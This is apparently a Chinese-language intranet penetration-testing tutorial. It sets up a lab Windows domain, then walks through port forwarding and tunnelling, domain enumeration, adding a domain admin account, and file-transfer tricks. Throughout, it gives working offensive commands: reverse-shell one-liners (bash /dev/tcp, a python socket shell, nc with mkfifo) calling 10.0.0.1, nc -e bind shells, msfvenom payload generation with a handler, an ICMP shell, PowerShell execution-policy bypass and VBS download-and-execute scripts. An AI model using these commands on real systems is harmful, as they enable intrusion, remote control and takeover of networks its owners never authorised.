<p></p><h3 id="域环境搭建"><a name="域环境搭建" href="#域环境搭建"></a>域环境搭建</h3><p>准备：<br>DC: win2008<br>DM: win2003<br>DM: winxp</p><hr class="page"><p>win2008(域控)<br>1、修改计算机名：<br><img src="pic/1_domain/1.jpg" alt=""></p><p>2、配置固定ip:<br>其中网关设置错误，应该为192.168.206.2，开始默认的网管<br><img src="pic/1_domain/2.jpg" alt=""></p><p>3、服务器管理器—-角色：<br><img src="pic/1_domain/3.jpg" alt=""></p><p>4、配置域服务:<br>dos下面输入<code>dcpromo</code><br><img src="pic/1_domain/4.jpg" alt=""></p><p>Ps：这里可能会因为本地administrator的密码规则不合要求，导致安装失败，改一个强密码</p><p>5、设置林根域：<br>林就是在多域情况下形成的森林,根表示基础,其他在此根部衍生<br>具体见：<a href="http://angerfire.blog.51cto.com/198455/144123/">http://angerfire.blog.51cto.com/198455/144123/</a><br><img src="pic/1_domain/5.jpg" alt=""></p><p>6、<strong>域数据存放的地址</strong><br><img src="pic/1_domain/6.jpg" alt=""></p><hr class="page"><p>win2003、winxp和08配置差不多</p><p>注意点是：<br>1、配置网络<br>dns server应该为主域控ip地址<br><img src="pic/1_domain/7.jpg" alt=""></p><p>2、加入域控<br><img src="pic/1_domain/8.jpg" alt=""></p><hr class="page"><p>域已经搭建完成，主域控会生成一个<code>krbtgt</code>账号<br>他是Windows活动目录中使用的客户/服务器认证协议，为通信双方提供双向身份认证<br><img src="pic/1_domain/9.jpg" alt=""></p><p>参考：<br>AD域环境的搭建 基于Server 2008 R2<br><a href="http://www.it165.net/os/html/201306/5493.html">http://www.it165.net/os/html/201306/5493.html</a><br>Acitve Directory 域环境的搭建<br><a href="http://blog.sina.com.cn/s/blog_6ce0f2c901014okt.html">http://blog.sina.com.cn/s/blog_6ce0f2c901014okt.html</a></p><h3 id="端口转发&amp;&amp;边界代理"><a name="端口转发&amp;&amp;边界代理" href="#端口转发&amp;&amp;边界代理"></a>端口转发&amp;&amp;边界代理</h3><p>此类工具很多，测试一两个经典的。</p><h5 id="端口转发"><a name="端口转发" href="#端口转发"></a>端口转发</h5><p>1、windows<br>lcx</p><pre><code data-origin="<pre><code>监听1234端口,转发数据到2333端口
本地:lcx.exe -listen 1234 2333

将目标的3389转发到本地的1234端口
远程:lcx.exe -slave ip 1234 127.0.0.1 3389
</code></pre>">监听1234端口,转发数据到2333端口
本地:lcx.exe -listen 1234 2333

将目标的3389转发到本地的1234端口
远程:lcx.exe -slave ip 1234 127.0.0.1 3389
</code></pre><p>netsh<br>只支持tcp协议</p><pre><code data-origin="<pre><code>添加转发规则
netsh interface portproxy set v4tov4 listenaddress=192.168.206.101 listenport=3333 connectaddress=192.168.206.100 connectport=3389
此工具适用于，有一台双网卡服务器，你可以通过它进行内网通信，比如这个，你连接192.168.206.101:3388端口是连接到100上面的3389

删除转发规则
netsh interface portproxy delete v4tov4 listenport=9090

查看现有规则
netsh interface portproxy show all

xp需要安装ipv6
netsh interface ipv6 install
</code></pre>">添加转发规则
netsh interface portproxy set v4tov4 listenaddress=192.168.206.101 listenport=3333 connectaddress=192.168.206.100 connectport=3389
此工具适用于，有一台双网卡服务器，你可以通过它进行内网通信，比如这个，你连接192.168.206.101:3388端口是连接到100上面的3389

删除转发规则
netsh interface portproxy delete v4tov4 listenport=9090

查看现有规则
netsh interface portproxy show all

xp需要安装ipv6
netsh interface ipv6 install
</code></pre><p><img src="pic/3_proxy/7.jpg" alt=""></p><p>更加详细参考：<a href="http://aofengblog.blog.163.com/blog/static/631702120148573851740/">http://aofengblog.blog.163.com/blog/static/631702120148573851740/</a></p><p>2、linux<br>portmap<br><img src="pic/3_proxy/2.jpg" alt=""></p><pre><code data-origin="<pre><code>监听1234端口,转发数据到2333端口
本地:./portmap -m 2 -p1 1234 -p2 2333

将目标的3389转发到本地的1234端口
./portmap -m 1 -p1 3389 -h2 ip -p2 1234
</code></pre>">监听1234端口,转发数据到2333端口
本地:./portmap -m 2 -p1 1234 -p2 2333

将目标的3389转发到本地的1234端口
./portmap -m 1 -p1 3389 -h2 ip -p2 1234
</code></pre><p>iptables</p><pre><code data-origin="<pre><code>1、编辑配置文件/etc/sysctl.conf的net.ipv4.ip_forward = 1

2、关闭服务
service iptables stop

3、配置规则
需要访问的内网地址：192.168.206.101
内网边界web服务器：192.168.206.129
iptables -t nat -A PREROUTING --dst 192.168.206.129 -p tcp --dport 3389 -j DNAT --to-destination 192.168.206.101:3389

iptables -t nat -A POSTROUTING --dst 192.168.206.101 -p tcp --dport 3389 -j SNAT --to-source 192.168.206.129

4、保存&amp;amp;&amp;amp;重启服务
service iptables save &amp;amp;&amp;amp; service iptables start
</code></pre>">1、编辑配置文件/etc/sysctl.conf的net.ipv4.ip_forward = 1

2、关闭服务
service iptables stop

3、配置规则
需要访问的内网地址：192.168.206.101
内网边界web服务器：192.168.206.129
iptables -t nat -A PREROUTING --dst 192.168.206.129 -p tcp --dport 3389 -j DNAT --to-destination 192.168.206.101:3389

iptables -t nat -A POSTROUTING --dst 192.168.206.101 -p tcp --dport 3389 -j SNAT --to-source 192.168.206.129

4、保存&amp;&amp;重启服务
service iptables save &amp;&amp; service iptables start
</code></pre><h5 id="socket代理"><a name="socket代理" href="#socket代理"></a>socket代理</h5><p>xsocks<br>1、windows<br><img src="pic/3_proxy/3.jpg" alt=""></p><p>进行代理后，在windows下推荐使用Proxifier进行socket连接，规则自己定义<br><img src="pic/3_proxy/4.jpg" alt=""></p><p>2、linux<br>进行代理后，推荐使用proxychains进行socket连接<br>kali下的配置文件：<br>/etc/proxychains.conf<br>添加一条：socks5     127.0.0.1 8888</p><p>然后在命令前加proxychains就进行了代理<br><img src="pic/3_proxy/5.jpg" alt=""></p><h5 id="神器推荐"><a name="神器推荐" href="#神器推荐"></a>神器推荐</h5><p><a href="http://rootkiter.com/EarthWorm/">http://rootkiter.com/EarthWorm/</a><br>跨平台+端口转发+socket代理结合体！darksn0w师傅的推荐。<br>ew_port_socket.zip</p><h5 id="基于http的转发与socket代理(低权限下的渗透)"><a name="基于http的转发与socket代理(低权限下的渗透)" href="#基于http的转发与socket代理(低权限下的渗透)"></a>基于http的转发与socket代理(低权限下的渗透)</h5><p>如果目标是在dmz里面，数据除了web其他出不来，便可以利用http进行<br>1、端口转发<br>tunna</p><pre><code data-origin="<pre><code>&amp;gt;端口转发(将远程3389转发到本地1234)
&amp;gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -r 3389 -v
&amp;gt;
&amp;gt;连接不能中断服务(比如ssh)
&amp;gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -r 22 -v -s
&amp;gt;
&amp;gt;转发192.168.0.2的3389到本地
&amp;gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -a 192.168.0.2 -r 3389
</code></pre>">&gt;端口转发(将远程3389转发到本地1234)
&gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -r 3389 -v
&gt;
&gt;连接不能中断服务(比如ssh)
&gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -r 22 -v -s
&gt;
&gt;转发192.168.0.2的3389到本地
&gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -a 192.168.0.2 -r 3389
</code></pre><p>具体参考：<a href="http://drops.wooyun.org/tools/650">http://drops.wooyun.org/tools/650</a></p><p>2、socks代理<br>reGeorg</p><pre><code data-origin="<pre><code>python reGeorgSocksProxy.py -u http://192.168.206.101/tunnel.php -p 8081
</code></pre>">python reGeorgSocksProxy.py -u http://192.168.206.101/tunnel.php -p 8081
</code></pre><p><img src="pic/3_proxy/6.jpg" alt=""></p><h5 id="ssh通道"><a name="ssh通道" href="#ssh通道"></a>ssh通道</h5><p><a href="http://staff.washington.edu/corey/fw/ssh-port-forwarding.html">http://staff.washington.edu/corey/fw/ssh-port-forwarding.html</a><br>1、端口转发</p><pre><code data-origin="<pre><code>本地访问127.0.0.1:port1就是host:port2(用的更多)
ssh -CfNg -L port1:127.0.0.1:port2 user@host    #本地转发

访问host:port2就是访问127.0.0.1:port1
ssh -CfNg -R port2:127.0.0.1:port1 user@host    #远程转发

可以将dmz_host的hostport端口通过remote_ip转发到本地的port端口
ssh -qTfnN -L port:dmz_host:hostport -l user remote_ip   #正向隧道，监听本地port

可以将dmz_host的hostport端口转发到remote_ip的port端口
ssh -qTfnN -R port:dmz_host:hostport -l user remote_ip   #反向隧道，用于内网穿透防火墙限制之类
</code></pre>">本地访问127.0.0.1:port1就是host:port2(用的更多)
ssh -CfNg -L port1:127.0.0.1:port2 user@host    #本地转发

访问host:port2就是访问127.0.0.1:port1
ssh -CfNg -R port2:127.0.0.1:port1 user@host    #远程转发

可以将dmz_host的hostport端口通过remote_ip转发到本地的port端口
ssh -qTfnN -L port:dmz_host:hostport -l user remote_ip   #正向隧道，监听本地port

可以将dmz_host的hostport端口转发到remote_ip的port端口
ssh -qTfnN -R port:dmz_host:hostport -l user remote_ip   #反向隧道，用于内网穿透防火墙限制之类
</code></pre><p>2、socks</p><pre><code data-origin="<pre><code>socket代理:
ssh -qTfnN -D port remotehost
</code></pre>">socket代理:
ssh -qTfnN -D port remotehost
</code></pre><p><img src="pic/3_proxy/8.jpg" alt=""></p><p>参考redrain大牛的文章：<a href="http://drops.wooyun.org/tips/5234">http://drops.wooyun.org/tips/5234</a></p><h3 id="获取shell"><a name="获取shell" href="#获取shell"></a>获取shell</h3><h5 id="常规shell反弹"><a name="常规shell反弹" href="#常规shell反弹"></a>常规shell反弹</h5><p>几个常用：</p><pre class="python hljs"><code class="python" data-origin="<pre><code class=&quot;python&quot;>1、bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/8080 0&amp;gt;&amp;amp;1

2、python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.0.1&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);'

3、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&amp;gt;&amp;amp;1|nc 10.0.0.1 1234 &amp;gt;/tmp/f
</code></pre>"><span class="hljs-number">1</span>、bash -i &gt;&amp; /dev/tcp/<span class="hljs-number">10.0</span>.0.1/<span class="hljs-number">8080</span> <span class="hljs-number">0</span>&gt;&amp;<span class="hljs-number">1</span>

<span class="hljs-number">2</span>、python -c <span class="hljs-string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>

<span class="hljs-number">3</span>、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i <span class="hljs-number">2</span>&gt;&amp;<span class="hljs-number">1</span>|nc <span class="hljs-number">10.0</span>.0.1 <span class="hljs-number">1234</span> &gt;/tmp/f
</code></pre><p>各种语言一句话反弹shell：<br><a href="http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%8F%8D%E5%BC%B9shell">http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%8F%8D%E5%BC%B9shell</a></p><h5 id="突破防火墙的imcp_shell反弹"><a name="突破防火墙的imcp_shell反弹" href="#突破防火墙的imcp_shell反弹"></a>突破防火墙的imcp_shell反弹</h5><p>有时候防火墙可能对tcp进行来处理，然而对imcp并没有做限制的时候，就可以来一波~<br>kali运行(其中的ip地址填写为目标地址win03)：<br><img src="pic/3_proxy/9.jpg" alt=""></p><p>win03运行：</p><pre><code data-origin="<pre><code>icmpsh.exe -t kali_ip -d 500 -b 30 -s 128
</code></pre>">icmpsh.exe -t kali_ip -d 500 -b 30 -s 128
</code></pre><p>可以看到icmp进行通信的<br><img src="pic/3_proxy/10.jpg" alt=""></p><h5 id="shell反弹不出的时候"><a name="shell反弹不出的时候" href="#shell反弹不出的时候"></a>Shell反弹不出的时候</h5><p>主要针对：本机kali不是外网或者目标在dmz里面反弹不出shell，可以通过这种直连shell然后再通过http的端口转发到本地的metasploit</p><pre><code data-origin="<pre><code>1、msfvenom -p windows/x64/shell/bind_tcp LPORT=12345 -f exe -o ./shell.exe
先生成一个bind_shell

2、本地利用tunna工具进行端口转发
python proxy.py -u http://lemon.com/conn.jsp  -l 1111 -r 12345 v

3、
use exploit/multi/handler
set payload windows/x64/shell/bind_tcp
set LPORT 1111
set RHOST 127.0.0.1
</code></pre>">1、msfvenom -p windows/x64/shell/bind_tcp LPORT=12345 -f exe -o ./shell.exe
先生成一个bind_shell

2、本地利用tunna工具进行端口转发
python proxy.py -u http://lemon.com/conn.jsp  -l 1111 -r 12345 v

3、
use exploit/multi/handler
set payload windows/x64/shell/bind_tcp
set LPORT 1111
set RHOST 127.0.0.1
</code></pre><p><img src="pic/3_proxy/1.jpg" alt=""></p><p>参考的文章：<br><a href="https://www.91ri.org/11722.html">https://www.91ri.org/11722.html</a></p><h5 id="正向shell"><a name="正向shell" href="#正向shell"></a>正向shell</h5><pre><code data-origin="<pre><code>1、nc -e /bin/sh -lp 1234

2、nc.exe -e cmd.exe -lp 1234
</code></pre>">1、nc -e /bin/sh -lp 1234

2、nc.exe -e cmd.exe -lp 1234
</code></pre><h3 id="信息收集(结构分析)"><a name="信息收集(结构分析)" href="#信息收集(结构分析)"></a>信息收集(结构分析)</h3><h5 id="基本命令"><a name="基本命令" href="#基本命令"></a>基本命令</h5><p>1、获取当前组的计算机名(一般remark有Dc可能是域控)：</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&amp;gt;net view
Server Name            Remark

-----------------------------------------------------------------------------
\\DC1
\\DM-WINXP
\\DM_WIN03
The command completed successfully.
</code></pre>">C:\Documents and Settings\Administrator\Desktop&gt;net view
Server Name            Remark

-----------------------------------------------------------------------------
\\DC1
\\DM-WINXP
\\DM_WIN03
The command completed successfully.
</code></pre><p>2、查看所有域</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&amp;gt;net view /domain
Domain

-----------------------------------------------------------------------------
CENTOSO
The command completed successfully.
</code></pre>">C:\Documents and Settings\Administrator\Desktop&gt;net view /domain
Domain

-----------------------------------------------------------------------------
CENTOSO
The command completed successfully.
</code></pre><p>3、从计算机名获取ipv4地址</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&amp;gt;ping -n 1 DC1 -4

Pinging DC1.centoso.com [192.168.206.100] with 32 bytes of data:

Reply from 192.168.206.100: bytes=32 time&amp;lt;1ms TTL=128

Ping statistics for 192.168.206.100:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
</code></pre>">C:\Documents and Settings\Administrator\Desktop&gt;ping -n 1 DC1 -4

Pinging DC1.centoso.com [192.168.206.100] with 32 bytes of data:

Reply from 192.168.206.100: bytes=32 time&lt;1ms TTL=128

Ping statistics for 192.168.206.100:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
</code></pre><p>Ps:如果计算机名很多的时候，可以利用bat批量ping获取ip</p><pre class="python hljs"><code class="python" data-origin="<pre><code class=&quot;python&quot;>@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F &quot;usebackq eol=- skip=1 delims=\&quot; %%j IN (`net view ^| find &quot;命令成功完成&quot; /v ^|find &quot;The command completed successfully.&quot; /v`) DO (
@FOR /F &quot;usebackq delims=&quot; %%i IN (`@ping -n 1 -4 %%j ^| findstr &quot;Pinging&quot;`) DO (
@FOR /F &quot;usebackq tokens=2 delims=[]&quot; %%k IN (`echo %%i`) DO (echo %%k  %%j)
)
)
</code></pre>"><span class="hljs-decorator">@echo off</span>
setlocal ENABLEDELAYEDEXPANSION
<span class="hljs-decorator">@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (</span>
<span class="hljs-decorator">@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (</span>
<span class="hljs-decorator">@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k  %%j)</span>
)
)
</code></pre><p><img src="pic/1_domain/10.jpg" alt=""></p><hr class="page"><p>以下执行命令时候会发送到域控查询,如果渗透的机器不是域用户权限,则会报错</p><pre><code data-origin="<pre><code>The request will be processed at a domain controller for domain
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
</code></pre>">The request will be processed at a domain controller for domain
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
</code></pre><p>4、查看域中的用户名</p><pre><code data-origin="<pre><code>dsquery user
或者：
C:\Users\lemon\Desktop&amp;gt;net user /domain

User accounts for \\DC1

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
lemon                    pentest
The command completed successfully.
</code></pre>">dsquery user
或者：
C:\Users\lemon\Desktop&gt;net user /domain

User accounts for \\DC1

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
lemon                    pentest
The command completed successfully.
</code></pre><p>5、查询域组名称</p><pre><code data-origin="<pre><code>C:\Users\lemon\Desktop&amp;gt;net group /domain

Group Accounts for \\DC1

----------------------------------------------
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.
</code></pre>">C:\Users\lemon\Desktop&gt;net group /domain

Group Accounts for \\DC1

----------------------------------------------
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.
</code></pre><p>6、查询域管理员</p><pre><code data-origin="<pre><code>C:\Users\lemon\Desktop&amp;gt;net group &quot;Domain Admins&quot; /domain
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-----------------------------------------------------------
Administrator
</code></pre>">C:\Users\lemon\Desktop&gt;net group "Domain Admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-----------------------------------------------------------
Administrator
</code></pre><p>7、添加域管理员账号</p><pre><code data-origin="<pre><code>添加普通域用户
net user lemon iam@L3m0n /add /domain
将普通域用户提升为域管理员
net group &quot;Domain Admins&quot; lemon /add /domain
</code></pre>">添加普通域用户
net user lemon iam@L3m0n /add /domain
将普通域用户提升为域管理员
net group "Domain Admins" lemon /add /domain
</code></pre><p>8、查看当前计算机名，全名，用户名，系统版本，工作站域，登陆域</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&amp;gt;net config Workstation
Computer name                        \\DM_WIN03
Full Computer name                   DM_win03.centoso.com
User name                            Administrator

Workstation active on
        NetbiosSmb (000000000000)
        NetBT_Tcpip_{6B2553C1-C741-4EE3-AFBF-CE3BA1C9DDF7} (000C2985F6E4)

Software version                     Microsoft Windows Server 2003

Workstation domain                   CENTOSO
Workstation Domain DNS Name          centoso.com
Logon domain                         DM_WIN03

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
</code></pre>">C:\Documents and Settings\Administrator\Desktop&gt;net config Workstation
Computer name                        \\DM_WIN03
Full Computer name                   DM_win03.centoso.com
User name                            Administrator

Workstation active on
        NetbiosSmb (000000000000)
        NetBT_Tcpip_{6B2553C1-C741-4EE3-AFBF-CE3BA1C9DDF7} (000C2985F6E4)

Software version                     Microsoft Windows Server 2003

Workstation domain                   CENTOSO
Workstation Domain DNS Name          centoso.com
Logon domain                         DM_WIN03

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
</code></pre><p>9、查看域控制器(多域控制器的时候,而且只能用在域控制器上)</p><pre><code data-origin="<pre><code>net group &quot;Domain controllers&quot;
</code></pre>">net group "Domain controllers"
</code></pre><p>10、查询所有计算机名称</p><pre><code data-origin="<pre><code>dsquery computer
下面这条查询的时候,域控不会列出
net group &quot;Domain Computers&quot; /domain
</code></pre>">dsquery computer
下面这条查询的时候,域控不会列出
net group "Domain Computers" /domain
</code></pre><p>11、net命令</p><pre><code data-origin="<pre><code>&amp;gt;1、映射磁盘到本地
net use z: \\dc01\sysvol

&amp;gt;2、查看共享
net view \\192.168.0.1

&amp;gt;3、开启一个共享名为app$，在d:\config
&amp;gt;net share app$=d:\config
</code></pre>">&gt;1、映射磁盘到本地
net use z: \\dc01\sysvol

&gt;2、查看共享
net view \\192.168.0.1

&gt;3、开启一个共享名为app$，在d:\config
&gt;net share app$=d:\config
</code></pre><p>12、跟踪路由</p><pre><code data-origin="<pre><code>tracert 8.8.8.8
</code></pre>">tracert 8.8.8.8
</code></pre><hr class="page"><h5 id="定位域控"><a name="定位域控" href="#定位域控"></a>定位域控</h5><p>1、查看域时间及域服务器的名字</p><pre><code data-origin="<pre><code>C:\Users\lemon\Desktop&amp;gt;net time /domain
Current time at \\DC1.centoso.com is 3/21/2016 12:37:15 AM
</code></pre>">C:\Users\lemon\Desktop&gt;net time /domain
Current time at \\DC1.centoso.com is 3/21/2016 12:37:15 AM
</code></pre><p>2、</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&amp;gt;Nslookup -type=SRV _ldap._tcp.
*** Can't find server address for '_ldap._tcp.':
DNS request timed out.
    timeout was 2 seconds.
*** Can't find server name for address 192.168.206.100: Timed out
Server:  UnKnown
Address:  192.168.206.100

*** UnKnown can't find -type=SRV: Non-existent domain
</code></pre>">C:\Documents and Settings\Administrator\Desktop&gt;Nslookup -type=SRV _ldap._tcp.
*** Can't find server address for '_ldap._tcp.':
DNS request timed out.
    timeout was 2 seconds.
*** Can't find server name for address 192.168.206.100: Timed out
Server:  UnKnown
Address:  192.168.206.100

*** UnKnown can't find -type=SRV: Non-existent domain
</code></pre><p>3、通过ipconfig配置查找dns地址</p><pre><code data-origin="<pre><code>ipconfig/all
</code></pre>">ipconfig/all
</code></pre><p>4、查询域控</p><pre><code data-origin="<pre><code>net group &quot;Domain Controllers&quot; /domain
</code></pre>">net group "Domain Controllers" /domain
</code></pre><hr class="page"><h5 id="端口收集"><a name="端口收集" href="#端口收集"></a>端口收集</h5><p>端口方面的攻防需要花费的时间太多，引用一篇非常赞的端口总结文章</p><table>
<thead>
<tr>
<th>端口号</th>
<th>端口说明</th>
<th>攻击技巧</th>
</tr>
</thead>
<tbody>
<tr>
<td>21/22/69</td>
<td>ftp/tftp：文件传输协议</td>
<td>爆破\嗅探\溢出\后门</td>
</tr>
<tr>
<td>22</td>
<td>ssh：远程连接</td>
<td>爆破OpenSSH；28个退格</td>
</tr>
<tr>
<td>23</td>
<td>telnet：远程连接</td>
<td>爆破\嗅探</td>
</tr>
<tr>
<td>25</td>
<td>smtp：邮件服务</td>
<td>邮件伪造</td>
</tr>
<tr>
<td>53</td>
<td>DNS：域名系统</td>
<td>DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙</td>
</tr>
<tr>
<td>67/68</td>
<td>dhcp</td>
<td>劫持\欺骗</td>
</tr>
<tr>
<td>110</td>
<td>pop3</td>
<td>爆破</td>
</tr>
<tr>
<td>139</td>
<td>samba</td>
<td>爆破\未授权访问\远程代码执行</td>
</tr>
<tr>
<td>143</td>
<td>imap</td>
<td>爆破</td>
</tr>
<tr>
<td>161</td>
<td>snmp</td>
<td>爆破</td>
</tr>
<tr>
<td>389</td>
<td>ldap</td>
<td>注入攻击\未授权访问</td>
</tr>
<tr>
<td>512/513/514</td>
<td>linux r</td>
<td>直接使用rlogin</td>
</tr>
<tr>
<td>873</td>
<td>rsync</td>
<td>未授权访问</td>
</tr>
<tr>
<td>1080</td>
<td>socket</td>
<td>爆破：进行内网渗透</td>
</tr>
<tr>
<td>1352</td>
<td>lotus</td>
<td>爆破：弱口令\信息泄漏：源代码</td>
</tr>
<tr>
<td>1433</td>
<td>mssql</td>
<td>爆破：使用系统用户登录\注入攻击</td>
</tr>
<tr>
<td>1521</td>
<td>oracle</td>
<td>爆破：TNS\注入攻击</td>
</tr>
<tr>
<td>2049</td>
<td>nfs</td>
<td>配置不当</td>
</tr>
<tr>
<td>2181</td>
<td>zookeeper</td>
<td>未授权访问</td>
</tr>
<tr>
<td>3306</td>
<td>mysql</td>
<td>爆破\拒绝服务\注入</td>
</tr>
<tr>
<td>3389</td>
<td>rdp</td>
<td>爆破\Shift后门</td>
</tr>
<tr>
<td>4848</td>
<td>glassfish</td>
<td>爆破：控制台弱口令\认证绕过</td>
</tr>
<tr>
<td>5000</td>
<td>sybase/DB2</td>
<td>爆破\注入</td>
</tr>
<tr>
<td>5432</td>
<td>postgresql</td>
<td>缓冲区溢出\注入攻击\爆破：弱口令</td>
</tr>
<tr>
<td>5632</td>
<td>pcanywhere</td>
<td>拒绝服务\代码执行</td>
</tr>
<tr>
<td>5900</td>
<td>vnc</td>
<td>爆破：弱口令\认证绕过</td>
</tr>
<tr>
<td>6379</td>
<td>redis</td>
<td>未授权访问\爆破：弱口令</td>
</tr>
<tr>
<td>7001</td>
<td>weblogic</td>
<td>Java反序列化\控制台弱口令\控制台部署webshell</td>
</tr>
<tr>
<td>80/443/8080</td>
<td>web</td>
<td>常见web攻击\控制台爆破\对应服务器版本漏洞</td>
</tr>
<tr>
<td>8069</td>
<td>zabbix</td>
<td>远程命令执行</td>
</tr>
<tr>
<td>9090</td>
<td>websphere控制台</td>
<td>爆破：控制台弱口令\Java反序列</td>
</tr>
<tr>
<td>9200/9300</td>
<td>elasticsearch</td>
<td>远程代码执行</td>
</tr>
<tr>
<td>11211</td>
<td>memcacache</td>
<td>未授权访问</td>
</tr>
<tr>
<td>27017</td>
<td>mongodb</td>
<td>爆破\未授权访问</td>
</tr>
</tbody>
</table><p>引用：<a href="https://www.91ri.org/15441.html">https://www.91ri.org/15441.html</a><br>wooyun也有讨论：<a href="http://zone.wooyun.org/content/18959">http://zone.wooyun.org/content/18959</a><br>对于端口也就是一个服务的利用，上文也只是大概的讲述，一些常见的详细利用与防御可以看看：<br><a href="http://wiki.wooyun.org/enterprise:server">http://wiki.wooyun.org/enterprise:server</a></p><h5 id="扫描分析"><a name="扫描分析" href="#扫描分析"></a>扫描分析</h5><p>1、nbtscan<br>获取mac地址：</p><pre><code data-origin="<pre><code>nbtstat -A 192.168.1.99
</code></pre>">nbtstat -A 192.168.1.99
</code></pre><p>获取计算机名\分析dc\是否开放共享</p><pre><code data-origin="<pre><code>nbtscan 192.168.1.0/24
</code></pre>">nbtscan 192.168.1.0/24
</code></pre><p><img src="pic/4/1.jpg" alt=""><br>其中信息：<br>SHARING  表示开放来共享，<br>DC  表示可能是域控，或者是辅助域控<br>U=user  猜测此计算机登陆名<br>IIS  表示运行来web80<br>EXCHANGE  Microsoft Exchange服务<br>NOTES   Lotus Notes服务</p><p>2、WinScanX<br>需要登录账号能够获取目标很详细的内容。其中还有snmp获取,windows密码猜解(但是容易被杀,nishang中也实现出一个类似的信息获取/Gather/Get-Information.ps1)</p><pre><code data-origin="<pre><code>WinScanX.exe -3 DC1 centoso\pentest password -a &amp;gt; test.txt
</code></pre>">WinScanX.exe -3 DC1 centoso\pentest password -a &gt; test.txt
</code></pre><p><img src="pic/4/2.jpg" alt=""></p><p>3、端口扫描<br>InsightScan<br>proxy_socket后，直接</p><pre><code data-origin="<pre><code>proxychains python scanner.py 192.168.0.0/24 -N
</code></pre>">proxychains python scanner.py 192.168.0.0/24 -N
</code></pre><p><a href="http://insight-labs.org/?p=981">http://insight-labs.org/?p=981</a></p><h3 id="内网文件传输"><a name="内网文件传输" href="#内网文件传输"></a>内网文件传输</h3><h5 id="windows下文件传输"><a name="windows下文件传输" href="#windows下文件传输"></a>windows下文件传输</h5><p>1、powershell文件下载<br>powershell突破限制执行：powershell -ExecutionPolicy Bypass -File .\1.ps1</p><pre><code data-origin="<pre><code>$d = New-Object System.Net.WebClient
$d.DownloadFile(&quot;http://lemon.com/file.zip&quot;,&quot;c:/1.zip&quot;)
</code></pre>">$d = New-Object System.Net.WebClient
$d.DownloadFile("http://lemon.com/file.zip","c:/1.zip")
</code></pre><p>2、vbs脚本文件下载</p><pre class="php hljs"><code class="php" data-origin="<pre><code class=&quot;php&quot;>Set xPost=createObject(&quot;Microsoft.XMLHTTP&quot;)
xPost.Open &quot;GET&quot;,&quot;http://192.168.206.101/file.zip&quot;,0
xPost.Send()
set sGet=createObject(&quot;ADODB.Stream&quot;)
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile &quot;c:\file.zip&quot;,2
</code></pre>">Set xPost=createObject(<span class="hljs-string">"Microsoft.XMLHTTP"</span>)
xPost.Open <span class="hljs-string">"GET"</span>,<span class="hljs-string">"http://192.168.206.101/file.zip"</span>,<span class="hljs-number">0</span>
xPost.Send()
set sGet=createObject(<span class="hljs-string">"ADODB.Stream"</span>)
sGet.Mode=<span class="hljs-number">3</span>
sGet.Type=<span class="hljs-number">1</span>
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile <span class="hljs-string">"c:\file.zip"</span>,<span class="hljs-number">2</span>
</code></pre><p>下载执行：</p><pre><code data-origin="<pre><code>cscript test.vbs
</code></pre>">cscript test.vbs
